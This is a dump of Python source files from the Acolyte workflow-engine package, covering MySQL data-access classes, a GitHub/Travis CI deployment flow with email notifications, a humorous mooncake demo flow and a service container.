code
stringlengths 501
5.19M
| package
stringlengths 2
81
| path
stringlengths 9
304
| filename
stringlengths 4
145
|
---|---|---|---|
import simplejson as json
from acolyte.core.flow import FlowTemplate
from acolyte.core.storage import AbstractDAO
def _mapper(result):
return FlowTemplate(
id_=result["id"],
flow_meta=result["flow_meta"],
name=result["name"],
bind_args=json.loads(result["bind_args"]),
max_run_instance=result["max_run_instance"],
config=json.loads(result["config"]),
creator=result["creator"],
created_on=result["created_on"]
)
class FlowTemplateDAO(AbstractDAO):
"""针对flow_template表的操作
"""
def __init__(self, db):
super().__init__(db)
def query_flow_template_by_id(self, template_id):
global _mapper
return self._db.query_one((
"select * from flow_template where id = %s"
), (template_id,), _mapper)
def query_flow_template_by_name(self, tpl_name):
global _mapper
return self._db.query_one((
"select * from flow_template where name = %s"
), (tpl_name,), _mapper)
def insert_flow_template(self, flow_meta, name, bind_args,
max_run_instance, config, creator, created_on):
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into `flow_template` "
"(flow_meta, name, bind_args, max_run_instance, "
"config, creator, created_on) values ("
"%s, %s, %s, %s, %s, %s, %s)"
), (flow_meta, name, json.dumps(bind_args), max_run_instance,
json.dumps(config), creator, created_on))
conn.commit()
return FlowTemplate(
id_=csr.lastrowid,
flow_meta=flow_meta,
name=name,
bind_args=bind_args,
max_run_instance=max_run_instance,
config=config,
creator=creator,
created_on=created_on
)
def update_flow_template(self, flow_tpl_id, name,
bind_args, max_run_instance, config):
return self._db.execute((
"update flow_template set name = %s, bind_args = %s, "
"max_run_instance = %s, config = %s where id = %s limit 1"
), (name, json.dumps(bind_args), max_run_instance, json.dumps(config),
flow_tpl_id))
def is_name_existed(self, name):
return self._db.execute((
"select id from flow_template where name = %s limit 1"
), (name,))
def delete_by_id(self, tpl_id):
if isinstance(tpl_id, list):
holders = ",".join(("%s", ) * len(tpl_id))
return self._db.execute((
"delete from flow_template where id in ({holders})"
).format(holders=holders), tpl_id)
else:
return self._db.execute((
"delete from flow_template where id = %s"
), (tpl_id,))
def query_all_templates(self):
return self._db.query_all((
"select * from flow_template"
), tuple(), _mapper)
def query_by_flow_meta_name(self, flow_meta_name):
return self._db.query_all((
"select * from flow_template where "
"flow_meta = %s"
), (flow_meta_name, ), _mapper)
def query_by_id_list(self, tpl_id_list, to_dict=False):
if not tpl_id_list:
return [] if not to_dict else {}
holders = ",".join(("%s", ) * len(tpl_id_list))
rs = self._db.query_all((
"select * from flow_template where id in ({holders})"
).format(holders=holders), tpl_id_list, _mapper)
if to_dict:
return {t.id: t for t in rs}
return rs | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/core/storage/flow_template.py | flow_template.py |
import datetime
import simplejson as json
from acolyte.core.storage import AbstractDAO
from acolyte.core.job import JobActionData
def _mapper(result):
result["id_"] = result.pop("id")
result["arguments"] = json.loads(result["arguments"])
result["data"] = json.loads(result["data"])
return JobActionData(**result)
class JobActionDataDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def query_by_id(self, id_):
return self._db.query_one((
"select * from job_action_data "
"where id = %s"
), (id_,), _mapper)
def query_by_job_instance_id_and_action(self, job_instance_id, action):
return self._db.query_all((
"select * from job_action_data where "
"job_instance_id = %s and action = %s"
), (job_instance_id, action), _mapper)
def query_by_instance_id(self, job_instance_id):
return self._db.query_all((
"select * from job_action_data where "
"job_instance_id = %s"
), (job_instance_id, ), _mapper)
def query_by_flow_instance_id(
self, flow_instance_id, to_dict=False):
job_actions = self._db.query_all((
"select * from job_action_data where "
"flow_instance_id = %s"
), (flow_instance_id, ), _mapper)
if to_dict:
if not job_actions:
return {}
return {
job_action.action: job_action
for job_action in job_actions
}
else:
return job_actions
def query_by_data_key(self, job_instance_id, action, data_key):
return self._db.query_one((
"select * from job_action_data where "
"job_instance_id = %s and action = %s and "
"data_key = %s limit 1"
), (job_instance_id, action, data_key), _mapper)
def insert(self,
job_instance_id, action, actor, arguments, data_key, data):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into job_action_data ("
"job_instance_id, action, actor, "
"arguments, data_key, data, created_on, updated_on)"
"values (%s, %s, %s, %s, %s, %s, %s, %s)"
), (job_instance_id, action, actor, json.dumps(arguments),
data_key, json.dumps(data), now, now))
conn.commit()
return JobActionData(
id_=csr.lastrowid,
job_instance_id=job_instance_id,
action=action,
actor=actor,
arguments=arguments,
data_key="",
data=data,
created_on=now,
updated_on=now
)
def update_data(self, action_data_id, data):
now = datetime.datetime.now()
return self._db.execute((
"update job_action_data set data = %s, "
"updated_on = %s "
"where id = %s"
), (json.dumps(data), now, action_data_id))
def update_data_with_key(self, action_data_id, key, data):
now = datetime.datetime.now()
return self._db.execute((
"update job_action_data set key = %s, "
"data = %s where id = %s"
), (key, json.dumps(data), now, action_data_id))
def delete_by_id(self, job_action_data_id):
return self._db.execute((
"delete from job_action_data where id = %s"
), (job_action_data_id,))
def delete_by_job_instance_id(self, job_instance_id):
return self._db.execute((
"delete from job_action_data where job_instance_id = %s"
), (job_instance_id,))
def sync_updated_on(self, job_action_data_id):
return self._db.execute((
"update job_action_data set updated_on = now() "
"where id = %s limit 1"
), (job_action_data_id,)) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/core/storage/job_action_data.py | job_action_data.py |
import datetime
from acolyte.core.storage import AbstractDAO
from acolyte.core.job import JobInstance, JobStatus
def _mapper(result):
result["id_"] = result.pop("id")
return JobInstance(**result)
class JobInstanceDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def query_by_id(self, instance_id):
return self._db.query_one((
"select * from job_instance where id = %s"
), (instance_id,), _mapper)
def query_by_instance_id_and_step(self, instance_id, step):
return self._db.query_one((
"select * from job_instance where "
"flow_instance_id = %s and step_name = %s limit 1"
), (instance_id, step), _mapper)
def insert(self, flow_instance_id, step_name, job_name, trigger_actor):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into job_instance ("
"flow_instance_id, step_name, job_name, "
"status, trigger_actor, "
"created_on, updated_on) values ("
"%s, %s, %s, %s, %s, %s, %s)"
), (flow_instance_id, step_name, job_name,
JobStatus.STATUS_RUNNING, trigger_actor, now, now))
conn.commit()
return JobInstance(
id_=csr.lastrowid,
flow_instance_id=flow_instance_id,
step_name=step_name,
job_name=job_name,
status=JobStatus.STATUS_RUNNING,
trigger_actor=trigger_actor,
created_on=now,
updated_on=now
)
def query_by_flow_instance_id(self, flow_instance_id):
return self._db.query_all((
"select * from job_instance where "
"flow_instance_id = %s"
), (flow_instance_id, ), _mapper)
def update_status(self, job_instance_id, status):
now = datetime.datetime.now()
return self._db.execute((
"update job_instance set status = %s, "
"updated_on = %s where id = %s limit 1"
), (status, now, job_instance_id))
def delete_by_flow_instance_id(self, flow_instance_id):
return self._db.execute((
"delete from job_instance where flow_instance_id = %s"
), (flow_instance_id,)) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/core/storage/job_instance.py | job_instance.py |
import datetime
from acolyte.core.user import User
from acolyte.core.storage import AbstractDAO
def _mapper(result):
result.pop("password")
result["id_"] = result.pop("id")
return User(**result)
class UserDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def query_user_by_id(self, user_id):
global _mapper
return self._db.query_one((
"select * from user where id = %s"
), (user_id,), _mapper)
def query_users_by_id_list(self, id_list, to_dict=False):
"""根据ID列表来批量查询用户信息
"""
global _mapper
holders = ",".join(("%s", ) * len(id_list))
users = self._db.query_all((
"select * from user "
"where id in ({holders})"
).format(holders=holders), id_list, _mapper)
if to_dict:
return {u.id: u for u in users}
return users
def is_email_exist(self, email):
return self._db.query_one(
"select id from user where email = %s", (email,))
def insert_user(self, email, password, name, role, github_account):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into user ("
"email, password, name, role, github_account, "
"created_on, last_login_time) values ("
"%s, %s, %s, %s, %s, %s, %s)"
), (email, password, name, role, github_account, now, now))
conn.commit()
return User(csr.lastrowid,
email, name, role, github_account, now, now)
def delete_by_id(self, user_id):
if isinstance(user_id, list):
holders = ",".join(("%s", ) * len(user_id))
return self._db.execute(
"delete from user where id in ({holders})".format(
holders=holders), user_id)
else:
return self._db.execute(
"delete from user where id = %s", (user_id, ))
def query_user_by_email_and_password(self, email, password):
global _mapper
return self._db.query_one((
"select * from user "
"where email = %s and password = %s"
), (email, password), _mapper)
def query_user_password(self, user_id):
return self._db.query_one_field((
"select password from user "
"where id = %s limit 1"
), (user_id,))
def update_password(self, user_id, password):
return self._db.execute((
"update user set password = %s "
"where id = %s limit 1"
), (password, user_id))
def query_by_github_account(self, github_account):
return self._db.query_one((
"select * from user where "
"github_account = %s limit 1"
), (github_account, ), _mapper) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/core/storage/user.py | user.py |
import datetime
import simplejson as json
from acolyte.core.storage import AbstractDAO
from acolyte.core.notify import (
NotifyIndex,
ReadStatus,
NotifyWay
)
_notify_ways = list(NotifyWay)
_read_status_list = list(ReadStatus)
def _mapper(row):
return NotifyIndex(
id_=row["id"],
notify_template=row["notify_template"],
receiver=row["receiver"],
subject_template_args=json.loads(row["subject_template_args"]),
content_template_args=json.loads(row["content_template_args"]),
digest_template_args=json.loads(row["digest_template_args"]),
notify_ways=json.loads(row["notify_ways"]),
read_status=_read_status_list[row["read_status"]],
updated_on=row["updated_on"],
created_on=row["created_on"]
)
class NotifyIndexDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def insert(self, notify_template, notify_receiver, notify_ways):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into notify_index(notify_template, receiver, "
"subject_template_args, content_template_args, "
"digest_template_args, notify_ways, read_status, "
"updated_on, created_on) values ("
"%s, %s, %s, %s, %s, %s, %s, %s, %s)"
), (
notify_template,
notify_receiver.receiver_user.id,
json.dumps(notify_receiver.subject_template_args),
json.dumps(notify_receiver.content_template_args),
json.dumps(notify_receiver.digest_template_args),
json.dumps([way.value for way in notify_ways]),
ReadStatus.UNREAD.value,
now, now
))
conn.commit()
return NotifyIndex.from_notify_receiver(
id_=csr.lastrowid,
notify_template=notify_template,
notify_receiver=notify_receiver,
notify_ways=notify_ways
)
def query_by_id(self, id_):
return self._db.query_one((
"select * from notify_index where "
"id = %s limit 1"
), (id_, ), _mapper)
def query_unread(self, receiver_id):
return self._db.query_all((
"select * from notify_index where "
"receiver = %s and read_status = %s "
"order by created_on desc"
), (receiver_id, ReadStatus.UNREAD.value), _mapper)
def query_unread_num(self, receiver_id):
return self._db.query_one_field((
"select count(*) from notify_index "
"where receiver = %s and read_status = %s"
), (receiver_id, ReadStatus.UNREAD.value))
def query_by_receiver_id(self, receiver_id, offset_id, limit):
return self._db.query_all((
"select * from notify_index where "
"receiver = %s where id < %s order by id desc "
"limit %s"
), (receiver_id, offset_id, limit), _mapper)
def update_read_status(self, id_, read_status):
now = datetime.datetime.now()
return self._db.execute((
"update notify_index set read_status = %s, "
"updated_on = %s "
"where id = %s limit 1"
), (read_status, now, id_))
def update_read_status_by_receiver_id(self, receiver_id, read_status):
now = datetime.datetime.now()
return self._db.execute((
"update notify_index set read_status = %s, "
"updated_on = %s "
"where receiver = %s"
), (read_status, now, receiver_id)) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/core/storage/notify_index.py | notify_index.py |
import datetime
from collections import defaultdict
from acolyte.util.json import to_json
from acolyte.core.storage import AbstractDAO
from acolyte.core.flow import FlowInstanceGroup
def _mapper(row):
row["id_"] = row.pop("id")
return FlowInstanceGroup(**row)
class FlowInstanceGroupDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def insert(self, name, description, meta, status):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert into flow_instance_group "
"(name, `description`, `meta`, status, "
"created_on, updated_on) values ("
"%s, %s, %s, %s, %s, %s)"
), (name, description, to_json(meta), status, now, now))
conn.commit()
return FlowInstanceGroup(
id_=csr.lastrowid,
name=name,
description=description,
meta=meta,
status=status,
created_on=now,
updated_on=now
)
def query_by_id(self, id_):
return self._db.query_one((
"select * from flow_instance_group where "
"id = %s limit 1"
), (id_, ), _mapper)
def query_by_id_list(self, id_list, to_dict=False):
if not id_list:
return {} if to_dict else []
holders = ",".join(("%s", ) * len(id_list))
rs = self._db.query_all((
"select * from flow_instance_group where "
"id in ({holders})"
).format(holders=holders), id_list, _mapper)
if to_dict:
return {g.id: g for g in rs}
return rs
def query_by_name(self, name):
return self._db.query_one((
"select * from flow_instance_group where "
"name = %s limit 1"
), (name, ), _mapper)
def query_by_datescope(self, begin_date, end_date):
return self._db.query_all((
"select * from flow_instance_group where "
"created_on between %s and %s"
), (begin_date, end_date), _mapper)
def update_status(self, id_, status):
now = datetime.datetime.now()
return self._db.execute((
"update flow_instance_group set status = %s, "
"updated_on = %s "
"where id = %s limit 1"
), (status, now, id_))
def delete(self, id_):
return self._db.execute((
"delete from flow_instance_group "
"where id = %s limit 1"
), (id_, ))
def query_all(self):
return self._db.query_all((
"select * from flow_instance_group"
), tuple(), _mapper)
class FlowInstanceGroupRelationDAO(AbstractDAO):
def __init__(self, db):
super().__init__(db)
def insert(self, flow_instance_id, group_id):
now = datetime.datetime.now()
with self._db.connection() as conn:
with conn.cursor() as csr:
csr.execute((
"insert ignore into flow_instance_group_relation "
"(flow_instance_id, group_id, created_on) "
"values (%s, %s, %s)"
), (flow_instance_id, group_id, now))
conn.commit()
def is_in_group(self, flow_instance_id, group_id):
return self._db.query_one_field((
"select id from flow_instance_group_relation where "
"flow_instance_id = %s and group_id = %s"
), (flow_instance_id, group_id))
def query_group_id_by_instance_id(self, flow_instance_id):
return self._db.query_one_field((
"select group_id from flow_instance_group_relation "
"where flow_instance_id = %s"
), (flow_instance_id, ))
def query_instance_id_lst_by_group_id(self, group_id):
rs = self._db.query_all((
"select flow_instance_id from "
"flow_instance_group_relation where "
"group_id = %s"
), (group_id,))
if not rs:
return []
return [row["flow_instance_id"] for row in rs]
def query_by_group_id_list(self, group_id_list):
if not group_id_list:
return {}
holders = ",".join(("%s", ) * len(group_id_list))
rs = self._db.query_all((
"select flow_instance_id, group_id from "
"flow_instance_group_relation where "
"group_id in ({holders})"
).format(holders=holders), group_id_list)
if not rs:
return {}
groupby_rs = defaultdict(list)
for row in rs:
groupby_rs[row["group_id"]].append(row["flow_instance_id"])
return groupby_rs
def query_group_ids_by_instance_ids(self, instance_ids):
if not instance_ids:
return {}
holders = ",".join(("%s", ) * len(instance_ids))
rs = self._db.query_all((
"select group_id, flow_instance_id from "
"flow_instance_group_relation where "
"flow_instance_id in ({holders})"
).format(holders=holders), instance_ids)
return {r["flow_instance_id"]: r["group_id"] for r in rs}
def delete_by_group_id(self, group_id):
return self._db.execute((
"delete from flow_instance_group_relation "
"where group_id = %s"
), (group_id, )) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/core/storage/flow_instance_group.py | flow_instance_group.py |
import datetime
from acolyte.core.job import (
AbstractJob,
JobRef,
action_args,
ActionArg,
Decision,
DecisionOption,
Jinja2DetailsPageUI,
)
from acolyte.util.time import common_fmt_dt
from acolyte.util.validate import Field, StrField
from acolyte.core.flow import FlowMeta
from acolyte.util.mail import send_mail
from acolyte.ui import Button
from jinja2 import Environment, PackageLoader
jinja2_env = Environment(
loader=PackageLoader('acolyte.builtin_ext', 'github_ui'))
email_template = jinja2_env.get_template("mail_template.html")
def _get_decision_url(context, decision_name):
decision_url = (
"http://{host}/job/instance/{instance_id}"
"/decision/{decision_name}"
).format(
host=context.config["host"],
instance_id=context.job_instance_id,
decision_name=decision_name
)
return decision_url
def _get_flow_instance_url(context):
flow_instance_url = (
"http://{host}/flow/instance/{instance_id}"
).format(
host=context.config["host"],
instance_id=context.flow_instance_id
)
return flow_instance_url
class GithubPushJob(AbstractJob):
"""接受github push事件
"""
def __init__(self):
super().__init__(
name="github_push",
description=(
"This job could handle github push event."
)
)
@action_args(
ActionArg(
Field("hook_data", type_=dict, required=True),
mark=ActionArg.MARK_AUTO, comment="github hook 接收的数据"),
)
def on_trigger(self, context, hook_data):
"""
:param hook_data: Github hook返回的数据
"""
# 要保存的数据结构
"""
{
"ref": "refs/heads/master",
"commits": [
{
"id": ...,
"message": ...,
"time": ...,
"committer": {
"name": "chihz",
"email": "[email protected]",
},
"added": [
],
"removed": [
],
"modified": [
"README.md"
]
}
],
"pusher": {
"name": "chihongze",
"email": "[email protected]"
}
}
"""
saved_data = {
"ref": hook_data["ref"],
"commits": [{
"id": commit["id"],
"message": commit["message"],
"time": commit["timestamp"],
"commiter": commit["committer"],
"added": commit["added"],
"removed": commit["removed"],
"modified": commit["modified"]
} for commit in hook_data["commits"]],
"pusher": hook_data["pusher"]
}
context.save(saved_data)
context.finish()
class TravisCIJob(AbstractJob):
"""处理Travis CI的构建
"""
def __init__(self):
super().__init__(
name="travis",
description="收集travis ci的执行结果",
ui=Jinja2DetailsPageUI(jinja2_env, "travis_build.html")
)
# 只有当travis构建成功并且代码review也成功的时候该Job才会完成
self._check_code_barrier = ["build_finish", "code_review"]
def on_trigger(self, context):
"""触发时记录只记录构建的开始时间
"""
context.save({"begin_time": common_fmt_dt(datetime.datetime.now())})
@action_args(
ActionArg(
Field("build_result", type_=int, required=True),
mark=ActionArg.MARK_AUTO,
comment="Travis CI构建结果 0 - 成功, 1 - 失败"
),
ActionArg(
Field("test_result", type_=dict, required=True),
mark=ActionArg.MARK_AUTO, comment="测试结果"
),
ActionArg(
Field("findbug_result", type_=dict, required=True),
mark=ActionArg.MARK_AUTO, comment="findbugs检查结果"
),
ActionArg(
Field("jar_file_name", type_=str, required=False),
mark=ActionArg.MARK_AUTO, comment="Jar包文件名称"
),
ActionArg(
Field("jar_base64", type_=str, required=False),
mark=ActionArg.MARK_AUTO, comment="Jar包文件的BASE64编码"
)
)
def on_build_finish(
self, context, build_result, test_result, findbug_result,
jar_file_name, jar_base64):
"""当TravisCI构建完成后执行此动作
:param build_result: 构建结果,即TRAVIS_TEST_RESULT
:param test_result: 测试结果 [
{
"testsuite": "chihz.bot.elder.ElderServiceTestCase",
"skipped": 0,
"failures": 1,
"errors": 0,
"testcases": [
{
"name":
"chihz.bot.elder.ElderServiceTestCase.testAnswerQuestion",
"status": "failure",
"failure_type": "org.junit.ComparisonFailure",
"traceback": ...
},
]
},
...
]
:param findbug_result: [
{
"bug_type": "DM_BOXED_PRIMITIVE_FOR_PARSING",
"bug_category": "performance",
"bug_description":
"Comparison of String parameter using == or != in",
"details": "xxxx"
}
]
:param jar_file_name: jar包文件名
:param jar_base64: jar包文件的base64编码
"""
# 处理构建成功
if build_result == 0:
jar_download_url = "http://{base_url}/{jar_file_name}".format(
base_url=context.config["jar_download_base_url"],
jar_file_name=jar_file_name
)
context.save({
"build_result": build_result,
"test_result": test_result,
"findbug_result": findbug_result,
"jar_download_url": jar_download_url
})
context["jar_download_url"] = jar_download_url
context.finish(waiting_for=self._check_code_barrier)
# 处理构建失败
else:
context.save({
"build_result": build_result,
"test_result": test_result,
"findbug_result": findbug_result,
})
context.failure() # 终止整个流程
@action_args(
ActionArg(
Field("code_review_result",
required=False, type_=bool, value_of=bool, default=False),
mark=ActionArg.MARK_AUTO,
comment="代码review结果"
)
)
def on_code_review(self, context, code_review_result):
if code_review_result:
context.finish(waiting_for=self._check_code_barrier)
else:
context.failure() # 不通过会终止整个工作流
class SandboxJob(AbstractJob):
"""部署到测试沙箱
"""
def __init__(self):
super().__init__(
name="sandbox",
description="该Job可以将Jar包部署到Sandbox",
decisions=[
Decision(
"do_deploy", "部署到沙箱", "部署当前版本到沙箱",
DecisionOption("deploy", "执行自动部署脚本")
),
Decision(
"deploy_sandbox", "反馈部署结果", "当前是否可以部署到沙箱?",
DecisionOption("agree", "可以部署"),
DecisionOption("disagree", "无法部署")
),
],
auto_trigger=True
)
def on_trigger(self, context):
"""被触发之后会先给运维发个邮件
"""
sandbox_deployer_email = context.config["sandbox_deployer_email"]
flow_details_url = _get_flow_instance_url(context)
decision_url = _get_decision_url(context, "deploy_sandbox")
send_mail(
receiver=sandbox_deployer_email,
subject="有新的版本需要您部署到沙箱",
content=email_template.render(
prompt="有新的版本需要您部署到沙箱,请您执行部署之后反馈部署结果,谢谢 : )",
buttons=(
Button("查看流程", flow_details_url),
Button("反馈部署结果", decision_url)
)
)
)
def on_deploy(self, context):
...
@action_args(
ActionArg(
StrField("test_service_url", required=True),
mark=ActionArg.MARK_AUTO, comment="部署完毕后的测试地址"
)
)
def on_agree(self, context, test_service_url):
"""当同意部署的时候会触发该事件,调用运维的接口自动部署到沙箱环境
"""
context.save({"test_service_url": test_service_url})
context["test_service_url"] = test_service_url
context.finish()
@action_args(
ActionArg(StrField("reason", required=True),
mark=ActionArg.MARK_AUTO, comment="不同意部署的原因")
)
def on_disagree(self, context, reason):
"""不同意部署,会产生一个原因
"""
context.save({"reason": reason})
context.failure()
class IntegrationTestJob(AbstractJob):
"""集成测试
"""
def __init__(self):
super().__init__(
name="integration_test",
description=(
"job for integration test"
),
decisions=(
Decision(
"do_test", "执行集成测试", "运行集成测试用例",
DecisionOption("test", "执行测试"),),
Decision(
"test_result", "反馈测试结果", "集成测试结果反馈",
DecisionOption("pass", "测试通过"),
DecisionOption("failure", "有点问题")
),
),
auto_trigger=True
)
def on_trigger(self, context):
qa_email = context.config["qa_email"]
decision_url = _get_decision_url(context, "test_result")
flow_instance_url = _get_flow_instance_url(context)
send_mail(
receiver=qa_email,
subject="沙箱中有新的版本需要测试了",
content=email_template.render(
prompt="沙箱中有新的版本需要测试,请您测试之后反馈结果,谢谢: )",
buttons=(
Button("查看流程", flow_instance_url),
Button("反馈测试结果", decision_url)
)
)
)
def on_test(self, context):
pass
def on_pass(self, context):
"""测试通过
"""
context.save({
"test_result": "success"
})
context.finish()
@action_args(
ActionArg(
StrField("reason", required=True),
mark=ActionArg.MARK_AUTO, comment="测试不通过的原因"
)
)
def on_failure(self, context, reason):
"""测试失败
"""
context.save({
"test_result": "failure",
"reason": reason
})
context.failure()
class MergeToMasterJob(AbstractJob):
def __init__(self):
super().__init__(
name="merge_to_master",
description=(
"merge dev branch to master"
),
auto_trigger=True
)
def on_trigger(self, context):
# TODO Call github api
context.finish()
class DeployJob(AbstractJob):
def __init__(self):
super().__init__(
name="deploy",
description=(
"job for deploying to online server"
),
auto_trigger=True,
decisions=[
Decision(
"do_deploy", "部署到线上", "部署到线上",
DecisionOption("deploy", "部署到线上"),
),
Decision(
"deploy_result", "反馈部署结果", "部署结果反馈",
DecisionOption("success", "部署成功"),
DecisionOption("failure", "部署失败")
)
]
)
def on_trigger(self, context):
deployer_email = context.config["deployer_email"]
flow_instance_url = _get_flow_instance_url(context)
send_mail(
receiver=deployer_email,
subject="有新工程需要部署",
content=email_template.render(
prompt="有新的工程需要您部署,部署完毕后请反馈部署结果,谢谢: )",
buttons=(
Button("查看流程", flow_instance_url),
)
)
)
def on_deploy(self, context):
...
def on_success(self, context):
context.finish()
def on_failure(self, context):
context.failure()
class CommonGithubFlowMeta(FlowMeta):
def __init__(self):
super().__init__(
name="common_github_flow",
description="常规的个人github项目流程",
jobs=(
# 接受github push
JobRef("github_push"),
# 处理TravisCI的构建结果
JobRef("travis"),
# 部署到沙箱
JobRef("sandbox"),
# 进行集成测试
JobRef("integration_test"),
# merge到master分支
JobRef("merge_to_master"),
# 部署到线上
JobRef("deploy")
)
)
def on_start(self, context):
...
def on_failure(self, context):
...
def on_finish(self, context):
...
def on_discard(self, context):
... | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/builtin_ext/github.py | github.py |
from acolyte.core.job import (
AbstractJob,
ActionArg,
JobRef,
action_args,
Jinja2DetailsPageUI,
Decision,
DecisionOption
)
from jinja2 import Environment, PackageLoader
from acolyte.core.flow import FlowMeta
from acolyte.core.service import Result
from acolyte.util.validate import IntField, StrField
jinja2_env = Environment(
loader=PackageLoader('acolyte.builtin_ext', 'mooncake_ui'))
class ProgrammerJob(AbstractJob):
def __init__(self):
super().__init__(
name="programmer",
description=(
"我是一个程序员,"
"我的爱好是抢月饼!"
),
ui=Jinja2DetailsPageUI(jinja2_env, "programmer.html")
)
def on_trigger(self, context):
"""程序员出场
"""
return Result.ok(data="好吧,我要开始加班还房贷了")
@action_args(
ActionArg(
IntField("cake_num", required=False, default=1, min_=1),
mark=ActionArg.MARK_AUTO, comment="抢到的月饼数目"
)
)
def on_midautumn(self, context, cake_num):
context.finish()
return Result.ok(data="我抢了{cake_num}个月饼".format(cake_num=cake_num))
class HRJob(AbstractJob):
def __init__(self):
super().__init__(
name="hr",
description=(
"我是一个HR,"
"我专门跟抢月饼的程序员过不去。"
),
auto_trigger=True
)
def on_trigger(self, context):
return Result.ok(data="刚才好像有人抢了月饼")
@action_args(
ActionArg(
StrField("who", required=True, regex=r'^\w+$'),
mark=ActionArg.MARK_AUTO,
comment="抢月饼的人"
)
)
def on_found(self, context, who):
context.finish()
return Result.ok(data="是{who}在抢月饼,我要去报告老板!".format(who=who))
class BossJob(AbstractJob):
def __init__(self):
super().__init__(
name="boss",
description=(
"我是老板,"
"我的心情即公司价值观"
),
decisions=[
Decision(
"handle_employee", "如何处理员工?",
DecisionOption("fire_him", "开除他!"),
DecisionOption("nice_mood", "没多大事,留下他吧。")
),
],
auto_trigger=True
)
def on_trigger(self, context):
return Result.ok(data="这个世界不是因为你能做什么,而是你该做什么。")
@action_args(
ActionArg(
StrField("mood", required=True),
mark=ActionArg.MARK_AUTO,
comment="老板心情",
)
)
def on_hr_report(self, context, mood):
if mood == "好":
context.finish()
return Result.ok(data="Geek文化嘛,多大点儿事")
else:
context.failure()
return Result.ok(data="不诚信,违反价值观,严肃处理")
@action_args(
ActionArg(
StrField("reason", required=True),
mark=ActionArg.MARK_AUTO,
comment="开除原因"
)
)
def on_fire_him(self, context, reason):
context.failure()
return Result.ok(data="开除此员工,因为:{}".format(reason))
def on_nice_mood(self, context):
context.finish()
context.save({"boos_think": "Geek文化嘛,多大点儿事"})
return Result.ok(data="Geek文化嘛,多大点儿事")
class MooncakeFlowMeta(FlowMeta):
def __init__(self):
super().__init__(
name="mooncake_flow",
description="抢月饼flow",
jobs=(
JobRef(
step_name="programmer",
job_name="programmer"
),
JobRef(
step_name="hr",
job_name="hr"
),
JobRef(
step_name="boss",
job_name="boss"
)
)
)
def on_start(self, context):
...
def on_failure(self, context):
...
def on_finish(self, context):
... | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/builtin_ext/mooncake.py | mooncake.py |
from acolyte.exception import (
EasemobFlowException,
ObjectAlreadyExistedException,
ObjectNotFoundException,
InvalidArgumentException
)
from acolyte.util import log
from acolyte.util.lang import get_full_class_name
from acolyte.core.service import AbstractService
class ServiceContainer:
"""所有服务性质的对象都可以通过该容器去注册,
可以通过该容器来获取需要依赖的服务
"""
def __init__(self):
self._container = {}
def register(self, service_id, service_obj,
init_callback=None, lazy=False, finalize=None):
"""将服务对象注册到容器
:param service_id: 服务对象标识,要求系统全局唯一
:param service_obj: 服务对象,可以是函数,模块或者其它什么东西,依赖者知道就行。
:param init_callback: 初始化函数
:param lazy: 是否是懒加载
"""
if service_id in self._container:
raise ObjectAlreadyExistedException(service_id)
service_defination = ServiceDefination(
service_id, service_obj, init_callback, lazy, finalize)
if not lazy:
service_defination.init()
self._container[service_id] = service_defination
log.acolyte.debug((
"register service {service_id} -> {service_class} to container"
).format(service_id=service_id,
service_class=get_full_class_name(service_obj.__class__)))
def register_service(
self, service_class,
init_callback=None, lazy=False, finalize=None):
"""该方法专门用于facade服务对象的注册
:param service_class: 服务对象类型
:param init_callback: 初始化函数
:param lazy: 是否是懒加载
"""
if not issubclass(service_class, AbstractService):
raise InvalidArgumentException(
"the service class must be the subclass of AbstractService")
self.register(
service_id=service_class.__name__,
service_obj=service_class(self),
init_callback=init_callback,
lazy=lazy,
finalize=finalize
)
def get_service(self, service_id):
"""从容器中获取服务
:param service_id: 服务对象标识
"""
if service_id not in self._container:
raise ObjectNotFoundException(service_id)
service_define = self._container[service_id]
if not service_define.has_inited():
service_define.init()
return service_define.service_obj
def after_register(self):
for service in self._container.values():
service.after_register()
def finalize(self):
for defination in self._container.values():
if defination.finalize is not None:
defination.finalize()
class ServiceDefination:
"""服务相关的meta数据
"""
def __init__(self, service_id, service_obj,
init_callback=None, lazy=False, finalize=None):
self._service_id = service_id
self._service_obj = service_obj
self._init_callback = init_callback
self._lazy = lazy
self._inited = False
self._finalize = finalize
@property
def service_id(self):
return self._service_id
@property
def service_obj(self):
return self._service_obj
@property
def init_callback(self):
return self._init_callback
@property
def lazy(self):
return self._lazy
@property
def finalize(self):
return self._finalize
def has_inited(self):
"""是否已经初始化
"""
return self._inited
def init(self):
"""执行初始化
"""
if self._inited:
# 已经初始化了,抛出异常
raise ServiceAlreadyInitedException(self._service_id)
if self._init_callback is not None:
self._init_callback(self._service_obj)
self._lazy = True
def after_register(self):
"""当容器注册完成之后,回调该方法
"""
if not hasattr(self._service_obj, "_after_register"):
return
self._service_obj._after_register()
class ServiceAlreadyInitedException(EasemobFlowException):
def __init__(self, service_id):
super().__init__(
"Service '{service_id}' already inited.".format(service_id)) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/util/service_container.py | service_container.py |
import re
import locale
from functools import wraps
from typing import Any
from types import FunctionType
from acolyte.exception import EasemobFlowException
from acolyte.core.message import (
messages,
default_validate_messages
)
